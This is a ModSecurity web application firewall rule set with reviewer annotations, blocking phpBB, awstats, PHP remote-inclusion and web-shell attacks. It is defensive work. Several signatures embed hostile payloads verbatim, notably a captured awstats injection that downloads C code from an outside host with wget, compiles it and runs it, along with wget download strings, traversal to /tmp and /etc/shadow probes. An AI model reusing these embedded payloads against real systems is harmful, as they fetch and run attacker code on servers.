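# Referer spam: match requests whose Referer header contains one of these
# redirect domains. No action is given, so the default action (set outside this
# excerpt) applies.
SecFilterSelective "HTTP_REFERER" "(go\.to|get\.to|drop\.to|hey\.to|switch\.to|dive\.to|move\.to|again\.at)"
# phpBB exploit signatures matched against the request line.
# The parentheses after "chr" are escaped so that they match a literal "(" and
# ")". Left unescaped they are regex groups, and the pattern then only matches
# the text with the parentheses missing.
# NOTE(review): the patterns spell out an encoded form (%252e). Confirm which
# form reaches the matcher after the engine's URL decoding; if the request is
# decoded first, these literal encodings may never match.
SecFilterSelective THE_REQUEST "chr\(101\)%252echr\(99\)%252echr\(104\)"
SecFilterSelective THE_REQUEST "chr\(99\)%252echr\(100\)%252echr\(32\)"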
SecFilterSelective THE_REQUEST "wget%20www.geocities.com/supahacker/bz.tgz"
SecFilterSelective THE_REQUEST "addnew&install_to=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./tmp"
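# awstats exploit: command injection through the configdir parameter.
# The first signature is one complete captured request string, so it only
# matches that exact payload; the second rule is the generic form.
# The long pattern is kept on a single line: when the quoted argument is
# wrapped onto a second line without a continuation, the remainder is read as a
# separate, unknown directive.
# NOTE(review): both patterns are written in URL-encoded form (%7c, %20).
# Confirm which form reaches the matcher after the engine's URL decoding.
SecFilterSelective THE_REQUEST "configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fawsimple%2etripod%2ecom%2fm%2ftest%2ec%3bgcc%20%2do%20nfsiod%20test%2ec%3b%2e%2fnfsiod%3becho%20e_exp%3b%2500"
SecFilterSelective THE_REQUEST "configdir=%20%7c"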
# Protect against phpBB2 Exploits
# Chained pair: the request must contain "viewtopic.php?" and also a chr(NNN)
# call (one to three digits) before the second rule's "deny,log" action applies.
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
# Matches a fixed User-Agent string, presumably the one a known exploit script
# sends. A client can change its User-Agent freely, so this only stops
# unmodified copies of that script.
SecFilterSelective HTTP_USER_AGENT "phpBB2 exploit"
# Exploit phpBB Highlighting Code Execution Attempt
# Looks for a quote followed by ".system(" after "&highlight=" in the request line.
SecFilterSelective THE_REQUEST "&highlight='\.system\("
# Exploit phpBB Highlighting SQL Injection
SecFilterSelective THE_REQUEST "&highlight='\.mysql_query\("
# Exploit phpBB Highlighting Code Execution - Santy.A Worm
SecFilterSelective THE_REQUEST "&highlight='\.fwrite\(fopen\("
# Exploit phpBB Highlight Exploit Attempt
# Matches the literal text "%27" (an encoded single quote) in the "highlight"
# argument.
# NOTE(review): if argument values are URL-decoded before matching, a singly
# encoded quote arrives as "'" and this pattern would only see double-encoded
# input. Confirm against the engine's decoding behaviour. The three rules
# above match a literal quote instead, so the two styles should be reconciled.
SecFilterSelective ARG_highlight %27
# Common web exploit
# Three literal strings: a "cmd=" parameter that changes into a temp directory
# and then starts a download with wget.
# These are exact-text signatures. The spacing around ";" differs between them
# ("/var/tmp;wget" versus "/tmp; wget"), and a request with any other spacing or
# directory matches none of them. Treat them as catching specific known
# requests, not as general command-injection coverage.
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;wget "
SecFilterSelective THE_REQUEST "cmd=cd /tmp; wget "
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;ls;wget "
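#Specific XML-RPC attacks on xmlrpc.php
# Three-rule chain; all three must match:
#   1. the request line names /xmlrpc.php,
#   2. the request contains "xml" (the "\<*" prefix allows zero or more "<"
#      before it, so plain "xml" anywhere is enough),
#   3. the request contains either an echo statement or a call to one of the
#      listed PHP functions, followed by ");".
# The function list is kept on a single line: when the quoted argument is
# wrapped onto a second line without a continuation, the pattern is cut in the
# middle of "posix_kill" and the remainder is read as a separate directive.
# NOTE(review): rules 2 and 3 use SecFilter; whether the XML body is inspected
# depends on POST scanning being enabled elsewhere in the configuration.
SecFilterSelective THE_REQUEST "/xmlrpc\.php" chain
SecFilter "\<*xml" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"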
# block common phish site URLs
# Each pattern is a path or host fragment that imitates an eBay, PayPal or
# Wells Fargo sign-in URL. A match means the request line contains that text.
# NOTE(review): the dots in "paypal.cgi-bin", "secure.cgi.paypal.com",
# "wellsfargo.cgi.bin" and "signin.ebay.com" are unescaped, so each one matches
# any single character, not only ".".
# NOTE(review): THE_REQUEST includes the query string, so a legitimate request
# that carries one of these strings as a parameter value (for example a link
# back to the real sign-in page) also matches. Review the audit log for false
# positives.
SecFilterSelective THE_REQUEST "aw/eBayISAPI"
SecFilterSelective THE_REQUEST "paypal-login"
SecFilterSelective THE_REQUEST "paypalmembers"
SecFilterSelective THE_REQUEST "paypal.cgi-bin"
SecFilterSelective THE_REQUEST "secure.cgi.paypal.com"
SecFilterSelective THE_REQUEST "wellsfargo.cgi.bin"
SecFilterSelective THE_REQUEST "signin.ebay.com"
# spammer bcc header injections
# Matches "bcc:" followed later by "@" anywhere in the POST body. The trailing
# ".*" adds nothing to the match.
# NOTE(review): the pattern does not require "bcc:" to start a line, so any
# form field that legitimately contains "bcc:" and an address is also caught.
# It only runs when POST payload scanning is enabled.
SecFilterSelective POST_PAYLOAD "bcc:.*@.*"
# Pull in the three gotroot.com rule files: exclusions, rootkit signatures and
# generic application rules.
# NOTE(review): the header of the exclusion file says it must be loaded FIRST
# to override other rules. Here it is included after the local rules above,
# and the order of the other two files also decides which rule sees a request
# first. Confirm the ordering is intended.
# NOTE(review): the text that follows on this page looks like the contents of
# these files shown inline. If it is also part of the live file, every rule is
# loaded twice.
Include /dh/apache2/template/etc/mod_sec_gotroot_exclude.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_rootkits.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_generic.conf
# http://www.gotroot.com/mod_security+rules
# Gotroot.com ModSecurity rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
# Exclusion Rules
#
# Download from: http://www.gotroot.com/downloads/ftp/mod_security/exclude.conf
# Copyright 2005, all rights reserved.
#
# Commercial redistribution prohibited.
#
# IMPORTANT NOTE! These rules must be loaded FIRST in your rule orderset to override
# other rules. If you load them later, they will not work!
#
# Version: N-20050905-01
###########################################
#Generic SQL injection rule exclusions
###########################################
# Every rule in this section uses the same SQL-statement pattern (a verb such
# as select/insert/drop, a list of names, then from/into/table/...), with the
# actions "pass,nolog": on a match the request continues and nothing is logged.
# NOTE(review): the labels below name specific applications, but no <Location>
# or <Directory> container is visible around any rule. As shown they all apply
# at the same scope, which makes the five SecFilter copies and the two
# POST_PAYLOAD copies duplicates. The containers may have been lost when the
# page was rendered. Restore the per-application scoping before relying on
# these rules.
# NOTE(review): "pass" lets processing continue with the next rule; it does not
# by itself exempt the request from SQL injection rules loaded later. Confirm
# these exclusions have the effect the header describes. If they do, note
# that an exclusion this broad also lets real SQL injection through wherever
# it applies.
# NOTE(review): inside the bracket expressions "|" is a literal character, not
# alternation, so "[A-Z|a-z|0-9|\*| |\,]" also accepts "|".
#generic PHP forum posting exclusion
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
#PhpBB posting
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
#Postnuke uploads
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
#Squirrel mail and Horde postings
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
#Phorum posting
SecFilterSelective POST_PAYLOAD "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
SecFilterSelective POST_PAYLOAD "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
###########################################
#Double pipe exclusion rules
###########################################
# Same pattern as the "Generic command line attack filter" in the application
# rules (pipe, two spaces somewhere after it, another pipe), here with
# "pass,nolog".
# NOTE(review): no container scopes this exclusion to a particular application,
# so as shown it applies to every request at this level.
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|" pass,nolog
###########################################
#Front page exclusions
###########################################
# NOTE(review): SecFilterInheritance Off stops the enclosing context from
# inheriting rules from its parent. No <Location>/<Directory> container is
# visible around it here; it may have been lost when the page was rendered.
# Unscoped, the directive affects whatever context includes this file rather
# than only the FrontPage paths the heading suggests. Confirm the intended
# scope before deploying.
SecFilterInheritance Off
# http://www.gotroot.com/mod_security+rules
# Gotroot.com ModSecurity rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
# Application Security Rules
#
# Download from: http://www.gotroot.com/downloads/ftp/mod_security/rules.conf
# Copyright 2005, all rights reserved.
#
# Commercial redistribution prohibited.
#
# Version: N-20051120-01
#--------------------------------
# notes
#--------------------------------
#--------------------------------
#start rules
#--------------------------------
#Enforce proper HTTP requests
# Matches (and so rejects) any request line that does not end in HTTP/0.9,
# HTTP/1.0 or HTTP/1.1.
SecFilterSelective THE_REQUEST "!HTTP\/(0\.9|1\.0|1\.1)$"
# Only accept request encodings we know how to handle
# we exclude GET requests from this because some (automated)
# clients supply "text/html" as Content-Type
# DreamHost added REPORT for subversion on Apache 2 only
# NOTE(review): because of the chain, the Content-Type test runs only when the
# method test matched, that is, only for methods NOT in the list. POST and PUT
# are in the list, so a POST or PUT with an unexpected Content-Type is never
# checked by this pair. If the aim is to restrict body encodings, the first
# rule should exclude only the body-less methods. Confirm the intent.
SecFilterSelective REQUEST_METHOD "!^(GET|HEAD|POST|PUT|PROPFIND|OPTIONS|LOCK|REPORT)$" chain
SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"
# Require Content-Length to be provided with
# every POST request
# Chained pair: method is exactly POST and the Content-Length value is empty
# (presumably a missing header is treated as empty; verify).
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"
# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
# Matches any request whose Transfer-Encoding header is non-empty.
SecFilterSelective HTTP_Transfer-Encoding "!^$"
#XSS insertion into Content-Type
# Looks in the request line for the text "Content-Type:" followed by a
# script-like tag pair, "onmouseover=" or "javascript:".
# NOTE(review): THE_REQUEST is the request line, not the header block, so this
# catches "Content-Type:" smuggled into the URL. It does not inspect the real
# Content-Type header.
SecFilterSelective THE_REQUEST "Content-Type\:.*(<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|onmouseover=|javascript\:)"
#Don't accept chunked encodings
#modsecurity can not look at these, so this is a hole
#that can bypass your rules, the rule before this one
#should cover this, but hey paranoia is cheap
# The earlier Transfer-Encoding rule ("!^$") already matches every non-empty
# value, so this rule is a deliberate second check for "chunked".
SecFilterSelective HTTP_Transfer-Encoding "chunked"
# The three rules below match requests that use this server as a forward
# proxy: the request begins with the method followed by an absolute
# http/https/ftp URL instead of a local path.
# NOTE(review): CONNECT is not covered here. Confirm proxying is disabled in
# the server configuration itself rather than relying on these filters alone.
#Web Proxy GET Request
SecFilter "^GET (http|https|ftp)\:/"
#Web Proxy HEAD Request
SecFilter "^HEAD (http|https|ftp)\:/"
#Proxy POST Request
SecFilter "^POST (http|https|ftp)\:/"
#Generic PHP exploit signatures
# Request line contains ";", then one of the listed PHP function names, then
# "(...)" and a closing ";".
SecFilterSelective THE_REQUEST "\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
#slightly tighter rules with narrower focus
# Same function list without the leading ";", applied to the URI and to the
# POST body separately.
# NOTE(review): the function names are not anchored to a word boundary, so any
# text ending in one of them and followed by "(...);" matches. Legitimate posts
# of source code to a forum or CMS are a likely source of false positives.
# NOTE(review): the POST_PAYLOAD rule only runs when POST scanning is enabled
# (SecFilterScanPOST); that setting is not visible in this excerpt.
SecFilterSelective REQUEST_URI "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
SecFilterSelective POST_PAYLOAD "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
#prevent PHP error leakage
# Matches response bodies containing "Fatal error:", so PHP error text with
# paths or query fragments is not sent to the client.
# NOTE(review): OUTPUT rules only run when output scanning is enabled
# (SecFilterScanOutput); that setting is not visible in this excerpt.
SecFilterSelective OUTPUT "Fatal error:"
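#generic XSS PHP attack types
# Chained pair: the request line targets a ".php?" URL and the request contains
# "javascript:/" followed by one of two script fragments (an ActiveXObject
# registry write, or a rewrite of the opener window's body.innerHTML).
# The dot in "body.innerHTML" is escaped as "\." like the other dots in the
# pattern. The earlier form ".\i" had the backslash on the wrong side, which
# left the dot as a wildcard and escaped the letter "i" instead.
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "javascript\:/(.*new\x20ActiveXObject.*Sh\.regwrite|.*window\.opener\.document\.body\.innerHTML=window\.opener\.document\.body\.innerHTML\.replace)"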
#Prevent SQL injection in cookies
# Cookie value contains either a SQL statement shape (verb, name list,
# from/into/table/...) or a "UNION SELECT ... INTO ... FROM" sequence.
# NOTE(review): inside the bracket expressions "|" is a literal character, not
# alternation, so "[A-Z|a-z|0-9|\*| |\,]" also accepts "|".
SecFilterSelective COOKIE_VALUES "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\'.*\'.*,[0-9].*INTO.*FROM)"
#Generic command line attack filter
# One or more pipes, then at least two spaces somewhere, then another pipe.
# NOTE(review): the exclusion rules file carries this same pattern with
# "pass,nolog". Check which of the two is evaluated first and whether the
# exclusion is scoped, otherwise one of them has no effect.
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|"
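#PHP Injection Attack generic signature
# NOTE(review): in the first rule below, "\.php*" means ".ph" followed by zero or more "p", so it matches ".ph" alone as well as ".php". If ".php" was intended the "*" should go; if other extensions were meant to be covered, spell them out.
# NOTE(review): several command names in these lists ("id", "cmd", "pwd", "whoami") have no trailing space, so "cmd=id" also matches values that merely begin with those letters.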
SecFilterSelective THE_REQUEST "\.php*" chain
SecFilter "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|pagina|path|include_location|root|page|gorumDir|site|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))"
SecFilterSelective THE_REQUEST "\.php\?(((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|pagina|path|pathtoroot|include_location|gorumDir|root|page|site|pun_root|open|seite)=(http|https|ftp)\:/|.*(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z]))"
#Generic PHP remote file inclusion attack signature
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=.*(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
#Generic PHP body attack
SecFilterSelective THE_REQUEST "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)" chain
SecFilterSelective POST_PAYLOAD "^PHP\:*((cd|mkdir)[[:space:]]+(/|[A-Z|a-z|0-9]|\.)*|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
#script, perl, etc. code in HTTP_Referer string
# Matches a "#!" interpreter line followed by a "/" inside the Referer header.
SecFilterSelective HTTP_Referer "\#\!.*/"
#generic command line attack
# NOTE(review): the "*" here is a regex quantifier, not a wildcard. "\|*" means
# zero or more pipes and "echo*" means "ech" followed by zero or more "o", so
# the pattern only matches "id;ech", optional extra "o"s, and then a pipe
# immediately after. Text between "echo" and the closing pipe prevents a match.
# If shell-glob behaviour was intended, ".*" is the regex equivalent. Confirm
# the intent before changing it, as that widens the rule.
SecFilterSelective THE_REQUEST "\|*id\;echo*\|"
SecFilterSelective ARGS "\|*id\;echo*\|"
#remote file inclusion generic attack signature
# These rules look for a file with a data or image extension that is given a
# query string, which is how a script disguised as an image or text file is
# addressed.
# Chained pair: such a file in the request line, plus either an include-style
# parameter pointing at a remote URL or a cmd/command/inc parameter.
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?" chain
SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"
# Single-rule form: the extension followed directly by "?&" and a command-style
# parameter.
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|command|inc|name)="
# The same two checks applied to argument values, for the case where the
# disguised file's URL is itself passed as a parameter.
SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)" chain
SecFilter "\?\&(cmd|inc|name)="
SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|inc|name)="
# A .php URL whose parameter is a remote URL that itself ends in "?&cmd=".
SecFilterSelective REQUEST_URI "\.php\?.*=(http|https|ftp)\:/.*\?&cmd="
#Bogus file extensions generic signature
# Double extension: an image extension immediately followed by ".txt".
SecFilterSelective THE_REQUEST "[A-Za-z0-9]\.(gif|jpg|png|bmp)\.txt"
#PHP remote path attack generic signature
# A PHP URL with a "path=" parameter that points at a remote http/https/ftp URL.
# NOTE(review): the first pattern requires ".php" optionally followed by 3 or
# 4, and anything it matches also contains ".php", so the second rule already
# covers it. ".phtml" is not covered by either.
SecFilterSelective REQUEST_URI "\.ph(p(3|4)?).*path=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI "\.php.*path=(http|https|ftp)\:/"
#generic attack sig
# "cd", zero or more spaces, ";", then one of the listed commands.
# NOTE(review): "cd\x20*\;" leaves no room for a directory argument between
# "cd" and ";", so "cd <dir>;<command>" does not match this rule.
SecFilterSelective THE_REQUEST "cd\x20*\;(cd|\;|echo|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"
# WEB-ATTACKS uname -a command attempt
# Chained pair: "uname" in the request line and " -a" anywhere in the request.
# The two need not be adjacent.
SecFilterSelective THE_REQUEST "uname" chain
SecFilter "\x20-a"
#generic php attack sigs
# URI-only signatures for a cmd/command parameter in positions typical of
# web shells: after "&", after a path ending in "cmd?", on a shell-named image
# or text file, or as the first parameter of a .php URL.
SecFilterSelective REQUEST_URI "&(cmd|command)=(id|uname)\x20"
SecFilterSelective REQUEST_URI "cmd\?(cmd|command)="
SecFilterSelective REQUEST_URI "(spy|cmd|cmd_out|sh)\.(gif|jpg|png|bmp|txt)\?&(cmd|command)="
SecFilterSelective REQUEST_URI "\.php\?&(cmd|command)="
#Generic PHP attack sig
# Literal call that runs the contents of an HTTP_PHP environment value.
SecFilterSelective THE_REQUEST "system\(getenv\(HTTP_PHP\)\)"
# WEB-ATTACKS /etc/shadow access
SecFilterSelective THE_REQUEST "/etc/shadow"
#remote bash shell
# Matches "/shell.php&cmd=" in the request line or in an argument value.
SecFilterSelective THE_REQUEST "/shell\.php\&cmd="
SecFilterSelective ARGS "/shell\.php\&cmd="
#Generic PHP payload command injection and upload vulnerabilities
# Three-rule chain: the POST body contains a PHP open tag, the request contains
# one of the listed file, socket or exec call shapes, and the request contains
# a PHP open tag again.
# NOTE(review): the third rule repeats the open-tag test with SecFilter instead
# of POST_PAYLOAD. If SecFilter also covers the POST body, it adds nothing to
# the first rule. Confirm whether it is needed.
# NOTE(review): only runs on bodies when POST scanning is enabled. Uploads
# sent as multipart/form-data may be handled differently from urlencoded
# bodies, so verify that uploaded file content is actually inspected.
SecFilterSelective POST_PAYLOAD "<\?php" chain
SecFilter "((fputs|fread)\(.*\,.*\)\;|fsockopen\(gethostbyname|chr\(.*\)\.chr\(.*\)\.chr\(|(fclose|fgets)\(.*\)\;|(system|exec)\(.*\)\;)" chain
SecFilter "\<\?php"
#http://www.gotroot.com/mod_security+rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
#Known rootkit, remote toolkit, etc. signature
#
#Download from: http://www.gotroot.com/downloads/ftp/mod_security/rootkits.conf
#copyright 2005, all rights reserved
#
# Commercial redistribution prohibited.
#
#Version: N-20051120-01
#
#http://www.gotroot.com
#see website for more information
# File-name signatures for known remote toolkits. Most match a specific file
# name with an image or text extension followed by "?", i.e. a script disguised
# as a static file and called with parameters.
# These are indicators of attempted or past compromise rather than protection
# on their own: renaming the file defeats the rule. A hit is worth
# investigating, because it shows someone expects that file to exist.
# NOTE(review): several names are generic ("/a.", "/get.", "/root.", "/sh.",
# "/shell.", "/bash."). Any legitimate static file with that name and a query
# string, such as a cache-busting parameter, is also matched.
SecFilterSelective THE_REQUEST "/cse\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/terminatorX-exp.*\.(gif|jpg|txt|bmp|php)\?"
SecFilterSelective THE_REQUEST "/\.it/viewde"
SecFilterSelective THE_REQUEST "/cmd\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/cmd\.php\.ns\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/cmd\.dat\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/sep\.txt\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/s\.txt\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/pro18\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/shell\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/bash\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(o|0|p)wn(e|3)d\.(gif|jpg|txt|bmp)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/get\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/root\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/spy\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/nmap\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/asc\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/lila\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/sh\.(gif|jpg|txt|bmp)\?"
# cmd/command file names with optional letter prefix, "new" prefix or digit suffix.
SecFilterSelective THE_REQUEST "/new(cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(cmd|command)[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/[a-z](cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/[a-z](cmd|command)[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/ijoo\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/oinc\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/a\.(gif|jpg|txt|bmp)\?"
# Script files named after an image type or a known tool; "ph(p(3|4)?|tml)"
# covers .php, .php3, .php4 and .phtml.
SecFilterSelective THE_REQUEST "/gif\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/jpg\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/ion\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/lala\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/phpshell\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12][05]\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12]\.ph(p(3|4)?|tml)\?"
# The "[12][0-9]" rule already matches tool25.js, so the rule after it is redundant.
SecFilterSelective THE_REQUEST "/tool[12][0-9]\.js"
SecFilterSelective THE_REQUEST "/tool25\.js"
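#Known rootkits
# Command strings and file names associated with specific kits; each is an
# exact-text indicator.
SecFilterSelective THE_REQUEST "perl xpl\.pl"
SecFilterSelective THE_REQUEST "perl kut"
SecFilterSelective THE_REQUEST "perl viewde"
SecFilterSelective THE_REQUEST "perl httpd\.txt"
SecFilterSelective THE_REQUEST "\./xkernel\;"
SecFilterSelective THE_REQUEST "/kaiten\.c"
SecFilterSelective THE_REQUEST "/mampus\?&(cmd|command)"
#Known rootkit Defacing Tool 2.0
# Two regex slips are corrected in this group:
#  - "d(ao)t" is a group that matches only the literal text "daot"; the bracket
#    form "d[ao]t" matches the "dat" and "dot" extensions that the literal
#    tool25\.dat rule at the end of this group shows were meant.
#  - "tool(12)" matches only "tool12"; "tool[12]" matches tool1/tool2 and, with
#    "[0-9]", tool10 to tool29, consistent with the "/tool[12][0-9]" rules
#    used for the .php and .js variants of the same tool.
# NOTE(review): the corrected patterns match more requests than before. Run
# them in log-only mode first if false positives are a concern.
SecFilterSelective THE_REQUEST "/tool[12][0-9]\.(d[ao]t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool\.(d[ao]t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool25\.(d[ao]t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool[12]\.(d[ao]t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/therules25\.(d[ao]t|gif|jpg|bmp|txt)\?(cmd|command)="
SecFilterSelective THE_REQUEST "/tool25\.jpg\?"
SecFilterSelective THE_REQUEST "/tool25\.dat\?"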
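#other known tools
# File-name indicators for specific web shells and helper scripts.
# NOTE(review): "/ssh.php" and "/ssh2.php" match on the name alone, with no
# query string required; a legitimate script with that name is also blocked.
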